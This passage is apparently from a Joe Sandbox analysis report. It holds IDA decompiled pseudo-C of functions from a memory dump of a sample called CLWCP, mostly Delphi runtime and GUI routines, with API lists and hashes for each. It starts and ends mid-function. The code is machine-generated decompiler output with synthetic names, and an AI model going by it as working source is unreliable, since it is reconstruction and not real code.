                                  						_v20 =  *((intOrPtr*)( *_t250 + 0x74));
                                  						_t188 =  *0x46ef3c; // 0x4310a8
                                  						_v68 = _t188;
                                  						_v12 = 0;
                                  						_t251 = 0;
                                  						_v97 = E00435DE4( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v72) == 0;
                                  						if(_v97 != 0 &&  *((short*)( *_t250 + 0x15a)) != 0) {
                                  							_t251 =  &_v97;
                                  							 *((intOrPtr*)( *_t250 + 0x158))( &_v72);
                                  						}
                                  						if(_v97 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
                                  							_t194 = 0;
                                  						} else {
                                  							_t194 = 1;
                                  						}
                                  						_t268 =  *_t250;
                                  						 *((char*)( *_t250 + 0x58)) = _t194;
                                  						if( *((char*)( *_t250 + 0x58)) == 0) {
                                  							goto L23;
                                  						} else {
                                  							_t323 = _v16;
                                  							if(_v16 == 0) {
                                  								goto L23;
                                  							}
                                  							E0045742C(_v68, _t268, _t309);
                                  							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x74))();
                                  							_t83 =  &_v12; // 0x457222
                                  							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xe4))( &_v113,  *_t83);
                                  							OffsetRect( &_v113, _v64, _v60);
                                  							if(E00403594( *((intOrPtr*)( *_t250 + 0x84)), _t323) != 0) {
                                  								_t238 = E0045748C(_v16, _t250, _t298, 0xffc8, _t309) + 5;
                                  								_v113.left = _v113.left - _t238;
                                  								_v113.right = _v113.right - _t238;
                                  							}
                                  							E004346A4( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v48);
                                  							_t218 =  *_t250;
                                  							 *((intOrPtr*)(_t218 + 0x64)) = _v140;
                                  							 *((intOrPtr*)(_t218 + 0x68)) = _v136;
                                  							E004346A4( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v48.right));
                                  							_t222 =  *_t250;
                                  							 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
                                  							 *((intOrPtr*)(_t222 + 0x70)) = _v136;
                                  							E00434D24( *((intOrPtr*)( *_t250 + 0x84)), _v52);
                                  							_t114 =  &_v12; // 0x457222
                                  							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xe0))( *_t114);
                                  							E0045482C(_v16);
                                  							_t231 = _v24;
                                  							if(_v24 <= 0) {
                                  								E00457064( *_t250, 1, _v20);
                                  							} else {
                                  								E00457064( *_t250, 0, _t231);
                                  							}
                                  							L26:
                                  							_pop(_t269);
                                  							 *[fs:eax] = _t269;
                                  							_push(E004578CA);
                                  							E00404140( &_v148, 2);
                                  							_t271 =  *0x44c2e4; // 0x44c2e8
                                  							return E00404B58( &_v72, _t271);
                                  						}
                                  					}
                                  				}
                                  			}













































                                  APIs
                                    • Part of subcall function 0044C6E0: GetActiveWindow.USER32 ref: 0044C6E3
                                    • Part of subcall function 0044C6E0: GetCurrentThreadId.KERNEL32 ref: 0044C6F8
                                    • Part of subcall function 0044C6E0: 72E7AC10.USER32(00000000,0044C6C0), ref: 0044C6FE
                                    • Part of subcall function 004572D4: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004575E5,00000000,004578C3), ref: 004572EF
                                    • Part of subcall function 004572D4: GetIconInfo.USER32(00000000,?), ref: 004572F5
                                  • ClientToScreen.USER32(?,?), ref: 0045766D
                                  • OffsetRect.USER32(?,?,?), ref: 00457684
                                  • OffsetRect.USER32(?,?,?), ref: 004577B0
                                    • Part of subcall function 00457064: SetTimer.USER32(00000000,00000000,00000000,00454738), ref: 0045707E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                  • String ID: "rE
                                  • API String ID: 3022406661-3744982519
                                  • Opcode ID: aec4732f204dcce991d1f06f3d3e5def4ae9b1fe246b9ec297da4d733dbcfc19
                                  • Instruction ID: dd17ed27896ebb43cb2b21dba9587b5cf66c6411717cce3b84c2ae32d6c98369
                                  • Opcode Fuzzy Hash: aec4732f204dcce991d1f06f3d3e5def4ae9b1fe246b9ec297da4d733dbcfc19
                                  • Instruction Fuzzy Hash: 6CC1F835A006188FCB10EFA9D884B8EB7F5BF49304F1181A6E905EB366DB34AD49CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E0040B3A4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* _t45;
                                  				void* _t47;
                                  				void* _t49;
                                  				void* _t51;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  				void* _t83;
                                  				void* _t92;
                                  				intOrPtr _t111;
                                  				void* _t122;
                                  				void* _t124;
                                  				intOrPtr _t127;
                                  				void* _t128;
                                  
                                  				_t128 = __eflags;
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t122 = __edx;
                                  				_t124 = __eax;
                                  				_push(_t127);
                                  				_push(0x40b574);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t127;
                                  				_t92 = 1;
                                  				E0040411C(__edx);
                                  				E0040B068(GetThreadLocale(), 0x40b58c, 0x1009,  &_v12);
                                  				if(E004081CC(0x40b58c, 1, _t128) + 0xfffffffd - 3 < 0) {
                                  					while(1) {
                                  						__eflags = _t92 - E004043DC(_t124);
                                  						if(__eflags > 0) {
                                  							goto L28;
                                  						}
                                  						asm("bt [0x46e10c], eax");
                                  						if(__eflags >= 0) {
                                  							_t45 = E004089D8(_t124 + _t92 - 1, 2, 0x40b590);
                                  							__eflags = _t45;
                                  							if(_t45 != 0) {
                                  								_t47 = E004089D8(_t124 + _t92 - 1, 4, 0x40b5a0);
                                  								__eflags = _t47;
                                  								if(_t47 != 0) {
                                  									_t49 = E004089D8(_t124 + _t92 - 1, 2, 0x40b5b8);
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
                                  										__eflags = _t51;
                                  										if(_t51 == 0) {
                                  											L24:
                                  											E004043E4(_t122, 0x40b5d0);
                                  										} else {
                                  											__eflags = _t51 != 0x20;
                                  											if(_t51 != 0x20) {
                                  												E00404304();
                                  												E004043E4(_t122, _v24);
                                  											} else {
                                  												goto L24;
                                  											}
                                  										}
                                  									} else {
                                  										E004043E4(_t122, 0x40b5c4);
                                  										_t92 = _t92 + 1;
                                  									}
                                  								} else {
                                  									E004043E4(_t122, 0x40b5b0);
                                  									_t92 = _t92 + 3;
                                  								}
                                  							} else {
                                  								E004043E4(_t122, 0x40b59c);
                                  								_t92 = _t92 + 1;
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						} else {
                                  							_v8 = E0040C410(_t124, _t92);
                                  							E0040463C(_t124, _v8, _t92,  &_v20);
                                  							E004043E4(_t122, _v20);
                                  							_t92 = _t92 + _v8;
                                  						}
                                  					}
                                  				} else {
                                  					_t75 =  *0x470748; // 0x9
                                  					_t76 = _t75 - 4;
                                  					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                  						_t77 = 1;
                                  					} else {
                                  						_t77 = 0;
                                  					}
                                  					if(_t77 == 0) {
                                  						E00404170(_t122, _t124);
                                  					} else {
                                  						while(_t92 <= E004043DC(_t124)) {
                                  							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
                                  							__eflags = _t83;
                                  							if(_t83 != 0) {
                                  								__eflags = _t83 != 0x20;
                                  								if(_t83 != 0x20) {
                                  									E00404304();
                                  									E004043E4(_t122, _v16);
                                  								}
                                  							}
                                  							_t92 = _t92 + 1;
                                  							__eflags = _t92;
                                  						}
                                  					}
                                  				}
                                  				L28:
                                  				_pop(_t111);
                                  				 *[fs:eax] = _t111;
                                  				_push(E0040B57B);
                                  				return E00404140( &_v24, 4);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(?,00000000,0040B574,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040B3D3
                                    • Part of subcall function 0040B068: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B086
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: eeee$ggg$yyyy
                                  • API String ID: 4232894706-1253427255
                                  • Opcode ID: 7d2df3939ca600c305348b3281ff63fb69253ec739afeb2b67f8d36bf37782ab
                                  • Instruction ID: 6ffbbef1c35fb081ea97715ea54a64dc0e1f942ee66854511e94466860814560
                                  • Opcode Fuzzy Hash: 7d2df3939ca600c305348b3281ff63fb69253ec739afeb2b67f8d36bf37782ab
                                  • Instruction Fuzzy Hash: 574125B07001159BC701A6AB8C9267FB295DB9530CB60447BF941F33D6DB3CDE0286AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00456CD0(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                  				char _v8;
                                  				char _v9;
                                  				char _v16;
                                  				char _v20;
                                  				intOrPtr _t39;
                                  				long _t44;
                                  				intOrPtr _t59;
                                  				void* _t70;
                                  				intOrPtr _t74;
                                  				intOrPtr* _t75;
                                  				intOrPtr _t76;
                                  				void* _t82;
                                  				void* _t83;
                                  				intOrPtr _t84;
                                  
                                  				_t80 = __esi;
                                  				_t79 = __edi;
                                  				_t82 = _t83;
                                  				_t84 = _t83 + 0xfffffff0;
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_v16 = 0;
                                  				_v20 = 0;
                                  				_v8 = __eax;
                                  				_push(_t82);
                                  				_push(0x456e1d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t84;
                                  				_t4 =  &_v8; // 0x45626c
                                  				_t63 = E00456BF0( *_t4);
                                  				_t5 =  &_v8; // 0x45626c
                                  				if( *((char*)( *_t5 + 0x88)) != 0) {
                                  					_t7 =  &_v8; // 0x45626c
                                  					_t59 =  *_t7;
                                  					_t87 =  *((intOrPtr*)(_t59 + 0x48));
                                  					if( *((intOrPtr*)(_t59 + 0x48)) == 0) {
                                  						_t9 =  &_v8; // 0x45626c
                                  						E0045729C( *_t9, 0, _t70);
                                  					}
                                  				}
                                  				E004546E0(_t63,  &_v20);
                                  				E00431B28(_v20, 0,  &_v16, _t87);
                                  				_t39 =  *0x470b40; // 0x0
                                  				E00456ECC(_t39, _v16, _t87);
                                  				_v9 = 1;
                                  				_push(_t82);
                                  				_push(0x456dc4);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t84;
                                  				_t15 =  &_v8; // 0x45626c
                                  				if( *((short*)( *_t15 + 0x12a)) != 0) {
                                  					_t18 =  &_v8; // 0x45626c
                                  					_t63 =  *_t18;
                                  					 *((intOrPtr*)( *_t18 + 0x128))();
                                  				}
                                  				if(_v9 != 0) {
                                  					_t23 =  &_v8; // 0x45626c
                                  					_t63 =  *( *_t23 + 0xc0);
                                  					if(_t63 > 0) {
                                  						__eflags =  *0x470b60;
                                  						if( *0x470b60 == 0) {
                                  							 *0x470b60 = SetTimer(0, 0, _t63, E00456C68);
                                  							__eflags =  *0x470b60;
                                  							if( *0x470b60 == 0) {
                                  								E00456B8C();
                                  							}
                                  						}
                                  					} else {
                                  						E00456B8C();
                                  					}
                                  				}
                                  				_pop(_t74);
                                  				 *[fs:eax] = _t74;
                                  				_t44 = GetCurrentThreadId();
                                  				_t75 =  *0x46fdc4; // 0x470030
                                  				if(_t44 ==  *_t75 && E0041990C(0, _t63, _t79, _t80) != 0) {
                                  					_v9 = 0;
                                  				}
                                  				if(_v9 != 0) {
                                  					WaitMessage();
                                  				}
                                  				_pop(_t76);
                                  				 *[fs:eax] = _t76;
                                  				_push(E00456E24);
                                  				return E00404140( &_v20, 2);
                                  			}

                                  APIs
                                    • Part of subcall function 00456BF0: GetCursorPos.USER32 ref: 00456BF9
                                  • SetTimer.USER32(00000000,00000000,?,00456C68), ref: 00456D9F
                                  • GetCurrentThreadId.KERNEL32 ref: 00456DD9
                                  • WaitMessage.USER32(00000000,00456E1D,?,?,?,0046D588), ref: 00456DFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CurrentCursorMessageThreadTimerWait
                                  • String ID: lbE
                                  • API String ID: 3909455694-4025571180
                                  • Opcode ID: fc7e9a840fdedb78e7883b13347f93155f4f8955f78323940c8e0ec33ad1f669
                                  • Instruction ID: 119c749b4d2774bbfa04347197884841368fee2bb2749aac63ce38faf7a0f5e9
                                  • Opcode Fuzzy Hash: fc7e9a840fdedb78e7883b13347f93155f4f8955f78323940c8e0ec33ad1f669
                                  • Instruction Fuzzy Hash: 04419330A04208EFDB10DB65D856B9EB7F5EB05309F9644BAE80497392D7786E4CCB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040BC3E(void* __ebx, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				struct _MEMORY_BASIC_INFORMATION _v36;
                                  				char _v297;
                                  				char _v304;
                                  				intOrPtr _v308;
                                  				char _v312;
                                  				char _v316;
                                  				char _v320;
                                  				intOrPtr _v324;
                                  				char _v328;
                                  				void* _v332;
                                  				char _v336;
                                  				char _v340;
                                  				char _v344;
                                  				char _v348;
                                  				intOrPtr _v352;
                                  				char _v356;
                                  				char _v360;
                                  				char _v364;
                                  				void* _v368;
                                  				char _v372;
                                  				intOrPtr _t52;
                                  				intOrPtr _t60;
                                  				intOrPtr _t82;
                                  				intOrPtr _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t100;
                                  				void* _t107;
                                  				intOrPtr _t109;
                                  				void* _t112;
                                  
                                  				_v372 = 0;
                                  				_v336 = 0;
                                  				_v344 = 0;
                                  				_v340 = 0;
                                  				_v8 = 0;
                                  				_push(_t112);
                                  				_push(0x40bdfb);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t112 + 0xfffffe90;
                                  				_t89 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                  					_t52 =  *0x46fc58; // 0x406dec
                                  					E00405C70(_t52,  &_v8);
                                  				} else {
                                  					_t86 =  *0x46fdcc; // 0x406de4
                                  					E00405C70(_t86,  &_v8);
                                  				}
                                  				_t109 =  *((intOrPtr*)(_t89 + 0x18));
                                  				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                  				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                  					_v368 =  *(_t89 + 0xc);
                                  					_v364 = 5;
                                  					_v360 = _v8;
                                  					_v356 = 0xb;
                                  					_v352 = _t109;
                                  					_v348 = 5;
                                  					_t60 =  *0x46fc64; // 0x406d94
                                  					E00405C70(_t60,  &_v372);
                                  					E0040B86C(_t89, _v372, 1, _t107, _t109, 2,  &_v368);
                                  				} else {
                                  					_v332 =  *(_t89 + 0xc);
                                  					_v328 = 5;
                                  					E0040438C( &_v340, 0x105,  &_v297);
                                  					E004087A8(_v340,  &_v336);
                                  					_v324 = _v336;
                                  					_v320 = 0xb;
                                  					_v316 = _v8;
                                  					_v312 = 0xb;
                                  					_v308 = _t109;
                                  					_v304 = 5;
                                  					_t82 =  *0x46fcd0; // 0x406e8c
                                  					E00405C70(_t82,  &_v344);
                                  					E0040B86C(_t89, _v344, 1, _t107, _t109, 3,  &_v332);
                                  				}
                                  				_pop(_t100);
                                  				 *[fs:eax] = _t100;
                                  				_push(E0040BE02);
                                  				E0040411C( &_v372);
                                  				E00404140( &_v344, 3);
                                  				return E0040411C( &_v8);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040BDFB), ref: 0040BCAB
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040BDFB), ref: 0040BCCD
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: <w@$m@
                                  • API String ID: 902310565-3560159811
                                  • Opcode ID: 7e32b2dba680f9ee8f9f5a057de95c60de42d1180f887a44240fab25573176b1
                                  • Instruction ID: 262b7cc9331fbf0f530a7c7c2ddf87ea5ca86dfae7e1aef43231c14f7292f596
                                  • Opcode Fuzzy Hash: 7e32b2dba680f9ee8f9f5a057de95c60de42d1180f887a44240fab25573176b1
                                  • Instruction Fuzzy Hash: 0831FB70904618DFDB61DF65CC85BD9B7F8EB48304F4040EAE908AB291D7789E848F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E00448EE8(intOrPtr* __eax) {
                                  				struct tagMENUITEMINFOA _v128;
                                  				intOrPtr _v132;
                                  				int _t16;
                                  				intOrPtr* _t29;
                                  				struct HMENU__* _t36;
                                  				MENUITEMINFOA* _t37;
                                  
                                  				_t37 =  &_v128;
                                  				_t29 = __eax;
                                  				_t16 =  *0x46fdc8; // 0x470744
                                  				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                  					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                  					_t37->cbSize = 0x2c;
                                  					_v132 = 0x10;
                                  					_v128.hbmpUnchecked =  &(_v128.cch);
                                  					_v128.dwItemData = 0x50;
                                  					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  					if(_t16 != 0) {
                                  						_t16 = E0044927C(_t29);
                                  						asm("sbb edx, edx");
                                  						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                  							_v128.cbSize = ((E0044927C(_t29) & 0x0000007f) << 0x0000000d) + ((E0044927C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                  							_v132 = 0x10;
                                  							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                  							if(_t16 != 0) {
                                  								return DrawMenuBar( *(_t29 + 0x38));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t16;
                                  			}










                                  APIs
                                  • GetMenuItemInfoA.USER32 ref: 00448F36
                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448F88
                                  • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448F95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: P
                                  • API String ID: 3227129158-3110715001
                                  • Opcode ID: e13710c0ff2b4aac6747bad2ba151a54afda6a5b37ea2b1952b90fb9b566bd0d
                                  • Instruction ID: 53b5d008a907d500d3d270b8b4b21312fbdd0c10407895a96187f0233fda2378
                                  • Opcode Fuzzy Hash: e13710c0ff2b4aac6747bad2ba151a54afda6a5b37ea2b1952b90fb9b566bd0d
                                  • Instruction Fuzzy Hash: CA11BF70205201AFE710DB28CC81B4B77D5AB84358F148A6EF195DB3E5DB79C888C74A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0040EBBC(signed short* __eax, void* __ecx) {
                                  				void* _t7;
                                  				signed short _t18;
                                  				intOrPtr* _t19;
                                  
                                  				_t12 = __eax;
                                  				_t18 =  *__eax & 0x0000ffff;
                                  				if(_t18 >= 0x14) {
                                  					if(_t18 != 0x100) {
                                  						if(_t18 != 0x101) {
                                  							if((_t18 & 0x00002000) == 0) {
                                  								_t7 = E00410618(_t18, _t19);
                                  								if(_t7 == 0) {
                                  									L0040D6B4();
                                  									L0040D6AC();
                                  								} else {
                                  									_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t19)) + 0x24))();
                                  								}
                                  							} else {
                                  								_t7 = E0040EA40(__eax);
                                  							}
                                  						} else {
                                  							_t7 =  *0x470814();
                                  						}
                                  					} else {
                                  						 *__eax = 0;
                                  						_t7 = E0040411C( &(__eax[4]));
                                  					}
                                  				} else {
                                  					_push(__eax);
                                  					L0040D6B4();
                                  					_t7 = E0040E90C(__eax);
                                  				}
                                  				return _t7;
                                  			}







                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID: t@
                                  • API String ID: 1473721057-2916730932
                                  • Opcode ID: a0590573830a7f80b8913dbc9a3df36a76268db15375c0b7bcb7968f84f741bf
                                  • Instruction ID: a4c5bda5b7be060efb6ec09bf4f15de92f611fd847c32c520330e0d7c33438b4
                                  • Opcode Fuzzy Hash: a0590573830a7f80b8913dbc9a3df36a76268db15375c0b7bcb7968f84f741bf
                                  • Instruction Fuzzy Hash: 11F0F4607081144AE7307B3BC8845A632A49F813187100C3BF0467B2D3CB3EDC66926F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0041083C() {
                                  				intOrPtr _t14;
                                  				intOrPtr* _t16;
                                  				intOrPtr* _t17;
                                  				intOrPtr* _t18;
                                  				intOrPtr* _t19;
                                  				intOrPtr* _t20;
                                  				intOrPtr _t23;
                                  
                                  				_push(_t23);
                                  				_push(0x4108dd);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t23;
                                  				 *0x470820 =  *0x470820 - 1;
                                  				if( *0x470820 < 0) {
                                  					E00410344();
                                  					 *0x470810 = E0040E94C;
                                  					 *0x470814 = E0040E574;
                                  					 *0x470818 = E0040E484;
                                  					 *0x47081c = E0040E574;
                                  					_t16 =  *0x46fbe4; // 0x46e00c
                                  					 *_t16 = E0040EC4C;
                                  					_t17 =  *0x46f9ec; // 0x46e010
                                  					 *_t17 = 0x410038;
                                  					_t18 =  *0x46fc54; // 0x46e014
                                  					 *_t18 = E0040EF60;
                                  					_t19 =  *0x46fd84; // 0x46e018
                                  					 *_t19 = E0040F294;
                                  					_t20 =  *0x46fc70; // 0x46e01c
                                  					 *_t20 = E0040F9B4;
                                  					_push(0x470828);
                                  					L0040629C();
                                  				}
                                  				_pop(_t14);
                                  				 *[fs:eax] = _t14;
                                  				_push(E004108E4);
                                  				return 0;
                                  			}











                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(Function_00070828,00000000,004108DD), ref: 004108CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalInitializeSection
                                  • String ID: L@$t@$t@
                                  • API String ID: 32694325-3831199040
                                  • Opcode ID: c015cd4b3715ff4d082952e1dc0e30eb8708b1a76d25eafca8bdff324460320d
                                  • Instruction ID: a22d123eaa6a32eb848eddf597e543a16d6253bfbf2f768ce15951058fc2f4b5
                                  • Opcode Fuzzy Hash: c015cd4b3715ff4d082952e1dc0e30eb8708b1a76d25eafca8bdff324460320d
                                  • Instruction Fuzzy Hash: 41015AB4205204DFD341EF29E901A117BE4FB4A300361C97BE848DB760E7B99899CBDE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040CBF4() {
                                  				_Unknown_base(*)()* _t1;
                                  				struct HINSTANCE__* _t3;
                                  
                                  				_t1 = GetModuleHandleA("kernel32.dll");
                                  				_t3 = _t1;
                                  				if(_t3 != 0) {
                                  					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                  					 *0x46e130 = _t1;
                                  				}
                                  				if( *0x46e130 == 0) {
                                  					 *0x46e130 = E00408864;
                                  					return E00408864;
                                  				}
                                  				return _t1;
                                  			}






                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040D681,00000000,0040D694), ref: 0040CBFA
                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040CC0B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                  • API String ID: 1646373207-3712701948
                                  • Opcode ID: 158cd66c8eb784ac48e0921195b6bfa71039512138e4a5419e043a5900f66fac
                                  • Instruction ID: c68ccd131e8ffc2f062f45f8866e767524613671bbdd6fcf588f7d79a5374073
                                  • Opcode Fuzzy Hash: 158cd66c8eb784ac48e0921195b6bfa71039512138e4a5419e043a5900f66fac
                                  • Instruction Fuzzy Hash: 6AD05E75648340CEF700BBF2ECC160A21C4A351704F000E3FE4457A2C2F7BC4810961D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E004329A0(intOrPtr* __eax, signed int __edx) {
                                  				intOrPtr _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _t50;
                                  				intOrPtr _t51;
                                  				intOrPtr _t54;
                                  				intOrPtr _t55;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				intOrPtr* _t61;
                                  				intOrPtr* _t63;
                                  				struct HICON__* _t66;
                                  				intOrPtr _t68;
                                  				intOrPtr* _t73;
                                  				intOrPtr _t75;
                                  				intOrPtr* _t76;
                                  				intOrPtr _t79;
                                  				intOrPtr _t81;
                                  				intOrPtr _t83;
                                  				intOrPtr _t85;
                                  				intOrPtr _t86;
                                  				struct HWND__* _t89;
                                  				intOrPtr _t90;
                                  				intOrPtr _t92;
                                  				intOrPtr _t93;
                                  				intOrPtr* _t95;
                                  				intOrPtr _t99;
                                  				intOrPtr _t102;
                                  				intOrPtr _t104;
                                  				intOrPtr _t105;
                                  				intOrPtr _t106;
                                  				intOrPtr _t108;
                                  				struct HWND__* _t109;
                                  				intOrPtr _t110;
                                  				intOrPtr _t112;
                                  				intOrPtr _t116;
                                  				intOrPtr _t119;
                                  				char _t120;
                                  				intOrPtr _t121;
                                  				void* _t135;
                                  				intOrPtr _t139;
                                  				intOrPtr _t144;
                                  				intOrPtr* _t159;
                                  				void* _t162;
                                  				void* _t169;
                                  				void* _t170;
